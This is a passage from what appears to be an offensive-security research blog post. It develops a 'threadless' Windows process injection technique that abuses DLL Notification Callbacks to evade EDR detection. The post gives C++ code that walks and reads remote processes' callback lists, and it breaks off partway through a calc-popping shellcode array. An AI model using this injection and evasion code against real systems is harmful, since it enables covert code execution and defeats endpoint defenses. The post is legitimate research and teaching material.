Preface

In this blog post we will discuss a new “threadless” process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.

As always, I like to show my methodology and way of thinking whenever I can. A good way of doing that is to share the process of discovering this technique. If you just want the TLDR you can go to the GitHub repo and find it there.

Before we begin however, a bit of background.

Anatomy of Process Injection

Almost every remote process injection follows the same 4 steps:

  1. Obtaining a handle to the remote process
  2. Allocating memory in the remote process
  3. Copying the malicious shellcode to the newly allocated memory in the remote process
  4. Executing the shellcode in the remote process

The most basic implementation is CRT (CreateRemoteThread) injection:

  1. OpenProcess (obtaining a handle)
  2. VirtualAllocEx (memory allocation)
  3. WriteProcessMemory (shellcode copying)
  4. CreateRemoteThread (shellcode execution)

There are variants and multiple ways to achieve each step. However, generally speaking almost every variation of remote process injection consists of those 4 steps.

“Threadless” Process Injection

Antiviruses and EDR products have learned to generalize process injection detections by looking for these 4 steps in quick succession – if a process does everything above, then it is most likely up to no good…

A few months ago, @CCob presented a novel concept at BSIDES (ThreadlessInject) which basically offloads the 4th step of the injection process, the execution step, to the remote process. This was accomplished by hooking a function in the remote process so when it calls the hooked function, it triggers our shellcode for us, thus eliminating an entire step in our process.

Another technique that follows the same concept of offloading the execution step to the remote process came out recently by @Kudaes and it’s called EPI. This technique works by changing the Entry Point of a DLL in the PEB of the remote process and pointing it to our shellcode. Once a thread is created or destroyed in the remote process, the Windows Loader will go through the PEB and call each DLL’s Entry Point. This way our shellcode will get executed for us.

The new technique we are releasing today follows the same concept – we will abuse DLL Notification Callbacks to offload the execution of our shellcode in the remote process.

DLL Notification Callbacks

I first stumbled upon this concept when I was diving into Zoom’s anti-DLL-proxying mechanism. A while back, I wrote a blog post about DLL Proxying in tele-conferencing applications such as Teams/Cisco WebEx/Zoom etc., and I noticed that Zoom has a mechanism in place which protects it from being abused with DLL Proxying. It somehow can see which DLL gets loaded and check if it is signed by Zoom or by Microsoft and if it’s not then the user will get a warning message stating that something may not be Kosher and ask if they are sure they want to continue with the execution.

Back in the day, I managed to bypass this by means of memory patching. Only recently did I start working on the second part of that blog post, in which I show how this mechanism can be bypassed (stay tuned for that), and so I decided to research this topic further. This is when I read this blog post, which states that Zoom uses the function LdrRegisterDllNotification to receive a callback before a DLL gets loaded. That blog post is from 2020 so things might have changed, but nevertheless, this got me intrigued. I decided to follow this rabbit hole in the hope of finding out whether this can be misused for offensive purposes.

If we search in MSDN for LdrDllNotification we won’t find a very verbose description of this topic unfortunately, but the gist of it is:

A notification callback function specified with the LdrRegisterDllNotification function. The loader calls this function when a DLL is first loaded.

Meaning, we can use the function LdrRegisterDllNotification to register our function as a callback to be called by the Windows Loader whenever a DLL is loaded (or unloaded). I then learned that some EDR products also use this to get telemetry from DLL load events in user-mode. In this code snippet by @onlymalware we can see how we, as attackers, can un-register all the LdrDllNotification callback functions in our own process to limit the telemetry potentially gathered by EDR products from our process.

This got me thinking, “what if we could register our own malicious callback in a remote process?”

Down The Rabbit Hole We Go

Well, our first problem is that there isn’t a way to use LdrRegisterDllNotification on a remote process. We need to figure out what exactly this function is doing under the hood and see if we can implement this ourselves in a remote process – easy right?

Before we start getting our hands dirty with custom implementations, let's first try to use the function as intended.

If we look at the MSDN page for LdrRegisterDllNotification we will see that it has no associated header file. However, we can import it via LoadLibrary and GetProcAddress.

We also need to define the function and all of its associated structures ourselves. Luckily, we have Google for that (@modexp specifically).

Here is the code I came up with:

C++
#include <Windows.h>
#include <stdio.h>

typedef struct _UNICODE_STR
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR pBuffer;
} UNICODE_STR, * PUNICODE_STR;

// structures and definitions taken from:
// https://modexp.wordpress.com/2020/08/06/windows-data-structures-and-callbacks-part-1/

typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA {
    ULONG           Flags;             // Reserved.
    PUNICODE_STR FullDllName;       // The full path name of the DLL module.
    PUNICODE_STR BaseDllName;       // The base file name of the DLL module.
    PVOID           DllBase;           // A pointer to the base address for the DLL in memory.
    ULONG           SizeOfImage;       // The size of the DLL image, in bytes.
} LDR_DLL_LOADED_NOTIFICATION_DATA, * PLDR_DLL_LOADED_NOTIFICATION_DATA;

typedef struct _LDR_DLL_UNLOADED_NOTIFICATION_DATA {
    ULONG           Flags;             // Reserved.
    PUNICODE_STR FullDllName;       // The full path name of the DLL module.
    PUNICODE_STR BaseDllName;       // The base file name of the DLL module.
    PVOID           DllBase;           // A pointer to the base address for the DLL in memory.
    ULONG           SizeOfImage;       // The size of the DLL image, in bytes.
} LDR_DLL_UNLOADED_NOTIFICATION_DATA, * PLDR_DLL_UNLOADED_NOTIFICATION_DATA;

typedef union _LDR_DLL_NOTIFICATION_DATA {
    LDR_DLL_LOADED_NOTIFICATION_DATA   Loaded;
    LDR_DLL_UNLOADED_NOTIFICATION_DATA Unloaded;
} LDR_DLL_NOTIFICATION_DATA, * PLDR_DLL_NOTIFICATION_DATA;

typedef VOID(CALLBACK* PLDR_DLL_NOTIFICATION_FUNCTION)(
    ULONG                       NotificationReason,
    PLDR_DLL_NOTIFICATION_DATA  NotificationData,
    PVOID                       Context);

typedef struct _LDR_DLL_NOTIFICATION_ENTRY {
    LIST_ENTRY                     List;
    PLDR_DLL_NOTIFICATION_FUNCTION Callback;
    PVOID                          Context;
} LDR_DLL_NOTIFICATION_ENTRY, * PLDR_DLL_NOTIFICATION_ENTRY;

typedef NTSTATUS(NTAPI* _LdrRegisterDllNotification) (
    ULONG                          Flags,
    PLDR_DLL_NOTIFICATION_FUNCTION NotificationFunction,
    PVOID                          Context,
    PVOID* Cookie);

typedef NTSTATUS(NTAPI* _LdrUnregisterDllNotification)(PVOID Cookie);


// Our callback function
VOID MyCallback(ULONG NotificationReason, const PLDR_DLL_NOTIFICATION_DATA NotificationData, PVOID Context)
{
    // %wZ is the MSVC printf specifier for a pointer to a UNICODE_STRING-style structure
    printf("[MyCallback] dll loaded: %wZ\n", NotificationData->Loaded.BaseDllName);
}

int main()
{
    // Get handle of ntdll
    HMODULE hNtdll = GetModuleHandleA("NTDLL.dll");

    if (hNtdll != NULL) {

        // find the LdrRegisterDllNotification function
        _LdrRegisterDllNotification pLdrRegisterDllNotification = (_LdrRegisterDllNotification)GetProcAddress(hNtdll, "LdrRegisterDllNotification");

        // Register our function MyCallback as a DLL Notification Callback
        PVOID cookie;
        NTSTATUS status = pLdrRegisterDllNotification(0, (PLDR_DLL_NOTIFICATION_FUNCTION)MyCallback, NULL, &cookie);
        if (status == 0) {
            printf("[+] Successfully registered callback\n");
        }
        
        // getchar break
        printf("[+] Press enter to continue\n");
        getchar();

        // Load some dll to trigger our callback function
        printf("[+] Loading USER32 DLL now\n");
        LoadLibraryA("USER32.dll");
    }
}

Running it indeed shows that our callback is getting called:

Now that we can register our own DLL Notification Callback in our own process let’s try to find out where it is stored. Looking at the function definition from MSDN we can see that the only thing we get in return (besides NTSTATUS) is a pointer to a “Cookie”. It is the same “Cookie” that we provide to LdrUnregisterDllNotification in order to remove a specific callback.

I searched for an explanation for this “Cookie” pointer, and this is what I learned:
This “Cookie” pointer is in fact a pointer to an LDR_DLL_NOTIFICATION_ENTRY which holds all the data related to the callback we registered. This includes a pointer to the callback function itself and a pointer to the context (which is not used in this case).
It also holds a LIST_ENTRY structure which points to the rest of the callbacks registered within the process.
All the callbacks registered in the process are stored in a doubly-linked list called “LdrpDllNotificationList” and are linked together through this LIST_ENTRY structure, which points to the previous and following callbacks.
This is similar to the doubly-linked “InMemoryOrderModuleList” in the PEB, which we sometimes use to find loaded DLLs and their exported functions when we want to avoid calling GetModuleHandle and GetProcAddress.
One thing to note is that the head of that “LdrpDllNotificationList” is in the .data section of NTDLL.
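
To make that layout concrete, here is a minimal, portable sketch of such a ring. It does not touch the real loader structures: ListEntry, NotificationEntry, LinkThree and CountRing are hypothetical stand-ins invented for this illustration, and callbackId is just a placeholder for the callback pointer.

```cpp
#include <cassert>
#include <cstddef>

// Simplified stand-in for LIST_ENTRY (assumption: illustration only).
struct ListEntry {
    ListEntry* flink; // next entry in the ring
    ListEntry* blink; // previous entry in the ring
};

// Simplified stand-in for LDR_DLL_NOTIFICATION_ENTRY. The link member comes
// first, so a ListEntry* and a NotificationEntry* share the same address.
struct NotificationEntry {
    ListEntry list;
    int       callbackId; // placeholder for the callback pointer
};

// Hand-link head -> first -> second -> head, the shape we would expect
// after two registrations on an otherwise empty list.
inline void LinkThree(ListEntry& head, NotificationEntry& first, NotificationEntry& second) {
    head.flink        = &first.list;
    head.blink        = &second.list;
    first.list.flink  = &second.list;
    first.list.blink  = &head;
    second.list.flink = &head;
    second.list.blink = &first.list;
}

// Count every node reachable from `start`, including `start` itself.
inline std::size_t CountRing(const ListEntry* start) {
    assert(start != nullptr);
    std::size_t count = 0;
    const ListEntry* current = start;
    do {
        ++count;
        current = current->flink;
    } while (current != start); // back where we began: one full lap
    return count;
}
```

Because the list is circular, the walk can start from any node, including the most recently added one, and it still visits every entry exactly once. Note that the head in this sketch is a bare link node with no callback attached, which is presumably also the case for the real list head.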

Knowing all that, we can register some dummy DLL Notification Callback, cast the “Cookie” pointer to an LDR_DLL_NOTIFICATION_ENTRY structure, and simply iterate over the doubly-linked list.

Here is the code for doing that:

C++
#include <Windows.h>
#include <stdio.h>

typedef struct _UNICODE_STR
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR pBuffer;
} UNICODE_STR, * PUNICODE_STR;

// structures and definitions taken from:
// https://modexp.wordpress.com/2020/08/06/windows-data-structures-and-callbacks-part-1/

typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA {
    ULONG           Flags;             // Reserved.
    PUNICODE_STR FullDllName;       // The full path name of the DLL module.
    PUNICODE_STR BaseDllName;       // The base file name of the DLL module.
    PVOID           DllBase;           // A pointer to the base address for the DLL in memory.
    ULONG           SizeOfImage;       // The size of the DLL image, in bytes.
} LDR_DLL_LOADED_NOTIFICATION_DATA, * PLDR_DLL_LOADED_NOTIFICATION_DATA;

typedef struct _LDR_DLL_UNLOADED_NOTIFICATION_DATA {
    ULONG           Flags;             // Reserved.
    PUNICODE_STR FullDllName;       // The full path name of the DLL module.
    PUNICODE_STR BaseDllName;       // The base file name of the DLL module.
    PVOID           DllBase;           // A pointer to the base address for the DLL in memory.
    ULONG           SizeOfImage;       // The size of the DLL image, in bytes.
} LDR_DLL_UNLOADED_NOTIFICATION_DATA, * PLDR_DLL_UNLOADED_NOTIFICATION_DATA;

typedef union _LDR_DLL_NOTIFICATION_DATA {
    LDR_DLL_LOADED_NOTIFICATION_DATA   Loaded;
    LDR_DLL_UNLOADED_NOTIFICATION_DATA Unloaded;
} LDR_DLL_NOTIFICATION_DATA, * PLDR_DLL_NOTIFICATION_DATA;

typedef VOID(CALLBACK* PLDR_DLL_NOTIFICATION_FUNCTION)(
    ULONG                       NotificationReason,
    PLDR_DLL_NOTIFICATION_DATA  NotificationData,
    PVOID                       Context);

typedef struct _LDR_DLL_NOTIFICATION_ENTRY {
    LIST_ENTRY                     List;
    PLDR_DLL_NOTIFICATION_FUNCTION Callback;
    PVOID                          Context;
} LDR_DLL_NOTIFICATION_ENTRY, * PLDR_DLL_NOTIFICATION_ENTRY;

typedef NTSTATUS(NTAPI* _LdrRegisterDllNotification) (
    ULONG                          Flags,
    PLDR_DLL_NOTIFICATION_FUNCTION NotificationFunction,
    PVOID                          Context,
    PVOID* Cookie);

typedef NTSTATUS(NTAPI* _LdrUnregisterDllNotification)(PVOID Cookie);


// Our callback function
VOID MyCallback(ULONG NotificationReason, const PLDR_DLL_NOTIFICATION_DATA NotificationData, PVOID Context)
{
    // %wZ is the MSVC printf specifier for a pointer to a UNICODE_STRING-style structure
    printf("[MyCallback] dll loaded: %wZ\n", NotificationData->Loaded.BaseDllName);
}

// Our second callback function
VOID MySecondCallback(ULONG NotificationReason, const PLDR_DLL_NOTIFICATION_DATA NotificationData, PVOID Context)
{
    // %wZ is the MSVC printf specifier for a pointer to a UNICODE_STRING-style structure
    printf("[MySecondCallback] dll loaded: %wZ\n", NotificationData->Loaded.BaseDllName);
}

int main()
{
    // Get handle of ntdll
    HMODULE hNtdll = GetModuleHandleA("NTDLL.dll");

    if (hNtdll != NULL) {

        // find the LdrRegisterDllNotification function
        _LdrRegisterDllNotification pLdrRegisterDllNotification = (_LdrRegisterDllNotification)GetProcAddress(hNtdll, "LdrRegisterDllNotification");

        // Register our function MyCallback as a DLL Notification Callback
        PVOID cookie;
        NTSTATUS status = pLdrRegisterDllNotification(0, (PLDR_DLL_NOTIFICATION_FUNCTION)MyCallback, NULL, &cookie);
        if (status == 0) {
            printf("[+] Successfully registered first callback\n");
        }

        // Register our function MySecondCallback as a DLL Notification Callback
        status = pLdrRegisterDllNotification(0, (PLDR_DLL_NOTIFICATION_FUNCTION)MySecondCallback, NULL, &cookie);
        if (status == 0) {
            printf("[+] Successfully registered second callback\n");
        }

        // Listing the current process DLL Notification List callbacks
        printf("[+] DLL Notification List:\n");

        // The head of the list is the next link in the chain 
        // since our callback is the last callback in the list
        PLIST_ENTRY head = ((PLDR_DLL_NOTIFICATION_ENTRY)cookie)->List.Flink;
        PLDR_DLL_NOTIFICATION_ENTRY entry = (PLDR_DLL_NOTIFICATION_ENTRY)head;
        do {
            // print the addresses of the LDR_DLL_NOTIFICATION_ENTRY and its callback function
            printf("    %p -> %p\n", entry, entry->Callback);

            // Iterate to the next callback in the list
            entry = (PLDR_DLL_NOTIFICATION_ENTRY)entry->List.Flink;
        } while ((PLIST_ENTRY)entry != head); // Stop when we reach the head of the list again

        printf("\n");

    }
}

In the above code we registered two different DLL Notification Callback functions and then iterated over the doubly-linked list while printing every entry in the list.

Here are the results of the above code:

*Head*ing In The Right Direction

Now that we know how to iterate over the LdrpDllNotificationList in our process, we need a way to reliably find the head of the list. At first, I thought I could just register a dummy callback. Since I just registered it, it will be the last entry in the list, so its List.Flink pointer will hold the head of the list. This is because in a circular doubly-linked list the last entry always points back to the first one, closing the loop.

C++
// Our dummy callback function
VOID DummyCallback(ULONG NotificationReason, const PLDR_DLL_NOTIFICATION_DATA NotificationData, PVOID Context)
{
    return;
}

// Get LdrpDllNotificationList head address
PLIST_ENTRY GetDllNotificationListHead() {
    PLIST_ENTRY head = 0;

    // Get handle of ntdll
    HMODULE hNtdll = GetModuleHandleA("NTDLL.dll");

    if (hNtdll != NULL) {

        // find LdrRegisterDllNotification function
        _LdrRegisterDllNotification pLdrRegisterDllNotification = (_LdrRegisterDllNotification)GetProcAddress(hNtdll, "LdrRegisterDllNotification");

        // find LdrUnregisterDllNotification function
        _LdrUnregisterDllNotification pLdrUnregisterDllNotification = (_LdrUnregisterDllNotification)GetProcAddress(hNtdll, "LdrUnregisterDllNotification");

        // Register our dummy callback function as a DLL Notification Callback
        PVOID cookie;
        NTSTATUS status = pLdrRegisterDllNotification(0, (PLDR_DLL_NOTIFICATION_FUNCTION)DummyCallback, NULL, &cookie);
        if (status == 0) {
            printf("[+] Successfully registered dummy callback\n");

            // Cookie is the last callback registered so its Flink holds the head of the list.
            head = ((PLDR_DLL_NOTIFICATION_ENTRY)cookie)->List.Flink;
            printf("[+] Found LdrpDllNotificationList head: %p\n", head);

            // Unregister our dummy callback function
            status = pLdrUnregisterDllNotification(cookie);
            if (status == 0) {
                printf("[+] Successfully unregistered dummy callback\n");
            }
        }
    }

    return head;
}

Although this approach works, it can have problems with race conditions where another thread may also register its own DLL Notification Callback right before we get the pointer to the head of the list.

So we have another option. Notice how the address of the first entry, the head of the list (aka LdrpDllNotificationList), is in a completely different memory region from the other entries. If we look at that region we will see it's in the .data section of NTDLL. So to reliably get the head of the LdrpDllNotificationList we can iterate over our list the same way we did before, but this time, stop when we find an entry residing within the memory range of the .data section of NTDLL.

For the sake of time, I left this implementation out of the blog post. I may add it to the final GitHub repo though.
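
The stopping condition itself is easy to illustrate in isolation. The following is a portable sketch only: it does not parse NTDLL's section headers, and ListEntry, InRange and FindEntryInRange are hypothetical names made up for this example. The caller is assumed to already know the base address and size of the region of interest.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Simplified stand-in for LIST_ENTRY (assumption: illustration only).
struct ListEntry {
    ListEntry* flink;
    ListEntry* blink;
};

// True when `p` lies inside the half-open range [base, base + size).
inline bool InRange(const void* p, const void* base, std::size_t size) {
    const auto addr  = reinterpret_cast<std::uintptr_t>(p);
    const auto start = reinterpret_cast<std::uintptr_t>(base);
    return addr >= start && addr - start < size;
}

// Walk the ring from `start` and return the first entry located inside the
// given range, or nullptr after one full lap without a match.
inline const ListEntry* FindEntryInRange(const ListEntry* start,
                                         const void* base, std::size_t size) {
    assert(start != nullptr);
    const ListEntry* current = start;
    do {
        if (InRange(current, base, size)) {
            return current;
        }
        current = current->flink;
    } while (current != start);
    return nullptr;
}
```

Since the result depends only on where an entry lives and not on when it was registered, this approach should not be affected by another thread appending a callback while we are looking.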

What About Remote Processes?

Up until this point we fiddled with our own process. For remote processes, this gets a bit tricky.

Let's start with the basics though. In order to read the memory of a remote process we can use the function ReadProcessMemory (or its NTAPI equivalent NtReadVirtualMemory).

https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-readprocessmemory

We also need a handle to the remote process, which we can get using OpenProcess (or its NTAPI equivalent NtOpenProcess).

https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess

Next, we need to know where to read from. Here, it's quite simple when you think about it. The LdrpDllNotificationList head resides in the NTDLL's .data section. Every process loads the same NTDLL from disk (duh...) and so the LdrpDllNotificationList head will be in the same place (relative to the base address of the NTDLL) in each process.

EDIT: @x86matthew and @Kharosx0 pointed out to me on Twitter that it is always safe to assume that ntdll is at the same location within all processes, so the next part is not needed. I chose not to change the blog post so others can also learn from this, but you can jump to the next section as this is not relevant for us anymore. The code on the GitHub repo has been updated to reflect the changes.

We can check the base address of NTDLL in our own process, get the LdrpDllNotificationList head address in memory, calculate the offset and apply the same offset to the NTDLL base address in the remote process, which we can get using this whacky function:

C++
#include "nt.h" // https://raw.githubusercontent.com/ShorSec/DllNotificationInjection/master/DllNotificationInjection/nt.h

LPVOID GetNtdllBase(HANDLE hProc) {
    
    // find NtQueryInformationProcess function
    NtQueryInformationProcess pNtQueryInformationProcess = (NtQueryInformationProcess)GetProcAddress((HMODULE)GetModuleHandleA("ntdll.dll"), "NtQueryInformationProcess");
    
    // Get the PEB of the remote process
    PROCESS_BASIC_INFORMATION info;
    NTSTATUS status = pNtQueryInformationProcess(hProc, ProcessBasicInformation, &info, sizeof(info), 0);
    ULONG_PTR ProcEnvBlk = (ULONG_PTR)info.PebBaseAddress;

    // Read the address pointer of the remote Ldr
    ULONG_PTR ldrAddress = 0;
    BOOL res = ReadProcessMemory(hProc, ((char*)ProcEnvBlk + offsetof(_PEB, pLdr)), &ldrAddress, sizeof(ULONG_PTR), nullptr);

    // Read the address of the remote InLoadOrderModuleList head
    ULONG_PTR ModuleListAddress = 0;
    res = ReadProcessMemory(hProc, ((char*)ldrAddress + offsetof(PEB_LDR_DATA, InLoadOrderModuleList)), &ModuleListAddress, sizeof(ULONG_PTR), nullptr);

    // Read the first LDR_DATA_TABLE_ENTRY in the remote InLoadOrderModuleList
    LDR_DATA_TABLE_ENTRY ModuleEntry = { 0 };
    res = ReadProcessMemory(hProc, (LPCVOID)ModuleListAddress, &ModuleEntry, sizeof(LDR_DATA_TABLE_ENTRY), nullptr);
    
    LIST_ENTRY* ModuleList = (LIST_ENTRY*)&ModuleEntry;
    WCHAR name[1024];
    ULONG_PTR nextModuleAddress = 0;

    LPWSTR sModuleName = (LPWSTR)L"ntdll.dll";
    
    // Start the forloop with reading the first LDR_DATA_TABLE_ENTRY in the remote InLoadOrderModuleList
    for (ReadProcessMemory(hProc, (LPCVOID)ModuleListAddress, &ModuleEntry, sizeof(LDR_DATA_TABLE_ENTRY), nullptr);
        // Stop when we reach the last entry
        (ULONG_PTR)(ModuleList->Flink) != ModuleListAddress; 
        // Read the next entry in the list
        ReadProcessMemory(hProc, (LPCVOID)nextModuleAddress, &ModuleEntry, sizeof(LDR_DATA_TABLE_ENTRY), nullptr))
    { 

        // Zero out the buffer for the dll name
        memset(name, 0, sizeof(name));

        // Read the buffer of the remote BaseDllName UNICODE_STRING into the buffer "name"
        ReadProcessMemory(hProc, (LPCVOID)ModuleEntry.BaseDllName.pBuffer, &name, ModuleEntry.BaseDllName.Length, nullptr);
        
        // Check if the name of the current module is ntdll.dll and if so, return the DllBase address
        if (wcscmp(name, sModuleName) == 0) {
            return (LPVOID)ModuleEntry.DllBase;
        }

        // Otherwise, set the nextModuleAddress to point for the next entry in the list
        ModuleList = (LIST_ENTRY*)&ModuleEntry;
        nextModuleAddress = (ULONG_PTR)(ModuleList->Flink);
    }
    return 0;
}

With the remote NTDLL base address in our possession we can invoke our GetDllNotificationListHead function to calculate the offset from our NTDLL base address. We can then add this offset to the remote NTDLL base address. This will give us the LdrpDllNotificationList head address of the remote process.
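
The arithmetic behind this is just "subtract one base, add the other". Here is a small sketch of it using plain integers. OffsetFromBase and RebaseAddress are hypothetical helper names, and the addresses in the usage note are arbitrary values picked for illustration, not real NTDLL addresses.

```cpp
#include <cassert>
#include <cstdint>

// Distance of `address` from the start of the module that contains it.
inline std::uint64_t OffsetFromBase(std::uint64_t address, std::uint64_t moduleBase) {
    assert(address >= moduleBase); // the address must lie at or above the base
    return address - moduleBase;
}

// Translate an address inside a module mapped at `localBase` to the matching
// address inside the same module mapped at `otherBase`.
inline std::uint64_t RebaseAddress(std::uint64_t localAddress,
                                   std::uint64_t localBase,
                                   std::uint64_t otherBase) {
    return otherBase + OffsetFromBase(localAddress, localBase);
}
```

For example, RebaseAddress(0x00007FFA1C17B2A0, 0x00007FFA1C000000, 0x00007FFB20000000) evaluates to 0x00007FFB2017B2A0. The sketch keeps the offset in a 64-bit type, whereas the code in this post stores it in an int, which only works as long as the offset fits in 31 bits.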

We can modify our old code a bit to allow for reading the DLL Notification Callbacks from a remote process using the LdrpDllNotificationList head address of the remote process.

C++
void PrintDllNotificationList(HANDLE hProc, LPVOID remoteHeadAddress) {
    printf("\n");
    printf("[+] Remote DLL Notification Block List:\n");

    // Allocate memory buffer for LDR_DLL_NOTIFICATION_ENTRY
    BYTE* entry = (BYTE*)malloc(sizeof(LDR_DLL_NOTIFICATION_ENTRY));

    // Read the head entry from the remote process
    ReadProcessMemory(hProc, remoteHeadAddress, entry, sizeof(LDR_DLL_NOTIFICATION_ENTRY), nullptr);
    LPVOID currentEntryAddress = remoteHeadAddress;
    do {

        // print the addresses of the LDR_DLL_NOTIFICATION_ENTRY and its callback function
        printf("    0x%p -> 0x%p\n", currentEntryAddress, ((PLDR_DLL_NOTIFICATION_ENTRY)entry)->Callback);

        // Get the address of the next callback in the list
        currentEntryAddress = ((PLDR_DLL_NOTIFICATION_ENTRY)entry)->List.Flink;

        // Read the next callback in the list
        ReadProcessMemory(hProc, currentEntryAddress, entry, sizeof(LDR_DLL_NOTIFICATION_ENTRY), nullptr);

    } while ((PLIST_ENTRY)currentEntryAddress != remoteHeadAddress); // Stop when we reach the head of the list again

    free(entry);

    printf("\n");
}

int main()
{
    // Get local LdrpDllNotificationList head address
    LPVOID localHeadAddress = (LPVOID)GetDllNotificationListHead();
    printf("[+] Local LdrpDllNotificationList head address: 0x%p\n", localHeadAddress);

    // Get local NTDLL base address
    HANDLE hNtdll = GetModuleHandleA("NTDLL.dll");
    printf("[+] Local NTDLL base address: %p\n", hNtdll);

    // calculate the offset of LdrpDllNotificationList from NTDLL base
    int offsetFromBase = (BYTE*)localHeadAddress - (BYTE*)hNtdll;
    printf("[+] LdrpDllNotificationList offset from NTDLL base: 0x%X\n", offsetFromBase);

    // Open handle to remote process
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 15624);
    printf("[+] Got handle to remote process\n");

    // Get remote NTDLL base address
    LPVOID remoteNtdllBase = GetNtdllBase(hProc);
    LPVOID remoteHeadAddress = (BYTE*)remoteNtdllBase + offsetFromBase;
    printf("[+] Remote LdrpDllNotificationList head address 0x%p\n", remoteHeadAddress);

    // Print the remote Dll Notification List
    PrintDllNotificationList(hProc, remoteHeadAddress);

}

Here are the results. On the right we can see our old code where we registered our two DLL Notification Callbacks and listed them. On the left you can see the code above listing those same callbacks from the remote process.

Writing > Reading

Now that we can read the DLL Notification Callbacks remotely, the road to writing them remotely is quite short.

But first, let's dive into the LDR_DLL_NOTIFICATION_ENTRY structure, specifically its LIST_ENTRY attribute.

C++
typedef struct _LIST_ENTRY {
   struct _LIST_ENTRY *Flink;
   struct _LIST_ENTRY *Blink;
} LIST_ENTRY, *PLIST_ENTRY, *RESTRICTED_POINTER PRLIST_ENTRY;

typedef struct _LDR_DLL_NOTIFICATION_ENTRY {
    LIST_ENTRY                     List;
    PLDR_DLL_NOTIFICATION_FUNCTION Callback;
    PVOID                          Context;
} LDR_DLL_NOTIFICATION_ENTRY, * PLDR_DLL_NOTIFICATION_ENTRY;

As we can see, each entry has an attribute List which is itself a structure of type LIST_ENTRY. This LIST_ENTRY has two attributes:

  1. Flink (Forward Link) which holds a pointer to the next entry in the list
  2. Blink (Backward Link) which holds a pointer to the previous entry in the list

When we use the function LdrRegisterDllNotification what happens under the hood (and I'm simplifying here) is the following:

  1. A new LDR_DLL_NOTIFICATION_ENTRY struct is allocated for the newly created entry
  2. The Callback attribute is set to point to our callback function
  3. The Context attribute is set to point to our provided context (if any)
  4. The List.Blink attribute is set to point to the last LDR_DLL_NOTIFICATION_ENTRY entry in the LdrpDllNotificationList
  5. The last LDR_DLL_NOTIFICATION_ENTRY entry in the LdrpDllNotificationList has its List.Flink changed to point to our newly created entry
  6. The List.Flink attribute is set to point to the head of the LdrpDllNotificationList (the last link in a circular doubly-linked list always points back to the head of the list).
  7. The LdrpDllNotificationList head has its List.Blink changed to point to our newly created entry
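
Steps 4 to 7 above are an ordinary tail insertion into a circular doubly-linked list. Below is a minimal in-memory sketch of just that pointer shuffle, similar in spirit to the WDK's InsertTailList. ListEntry, InitializeHead and InsertTail are simplified names chosen for this example, and nothing here talks to the loader.

```cpp
#include <cassert>

// Simplified stand-in for LIST_ENTRY (assumption: illustration only).
struct ListEntry {
    ListEntry* flink;
    ListEntry* blink;
};

// An empty circular list is a head that points to itself in both directions.
inline void InitializeHead(ListEntry* head) {
    assert(head != nullptr);
    head->flink = head;
    head->blink = head;
}

// Append `entry` so that it becomes the last node before the head.
inline void InsertTail(ListEntry* head, ListEntry* entry) {
    assert(head != nullptr && entry != nullptr);
    ListEntry* last = head->blink; // current last entry (the head itself if the list is empty)
    entry->blink = last;           // step 4: new entry points back at the old last entry
    last->flink  = entry;          // step 5: old last entry points forward at the new entry
    entry->flink = head;           // step 6: new entry points forward at the head
    head->blink  = entry;          // step 7: head points back at the new entry
}
```

After calling InsertTail(&head, &a) and then InsertTail(&head, &b) on an initialized head, following Flink from the head visits a, then b, then the head again, and following Blink visits them in reverse.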

Here is a nice diagram to help clarify this concept. This is taken from the GeeksForGeeks post on Doubly-Linked Lists. One difference to note is that in our case the head and the tail are connected as well, which is what is known as a Circular Doubly-Linked List.

https://www.geeksforgeeks.org/introduction-and-insertion-in-a-doubly-linked-list/

Now that that's out of the way, let's get started. We will basically implement all of the steps above ourselves. In this specific POC (Piece of Code lol) we will use a simple calc shellcode (from Sektor7) and we will use VirtualAllocEx and WriteProcessMemory as our allocation and memory writing primitives, as OPSEC is out of scope for this blog post (things are already complicated enough without it).

C++
// Pop Calc.exe Shellcode from Sektor7
unsigned char shellcode[276] = { 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x0, 0x0, 0x0, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0xf, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x2, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x1, 0xd0, 0x8b, 0x80, 0x88, 0x0, 0x0, 0x0, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x1, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x1, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x1, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x3, 0x4c, 0x24, 0x8, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x1, 0xd0, 0x66, 0x41, 0x8b, 0xc, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x1, 0xd0, 0x41, 0x8b, 0x4, 0x88, 0x48, 0x1, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 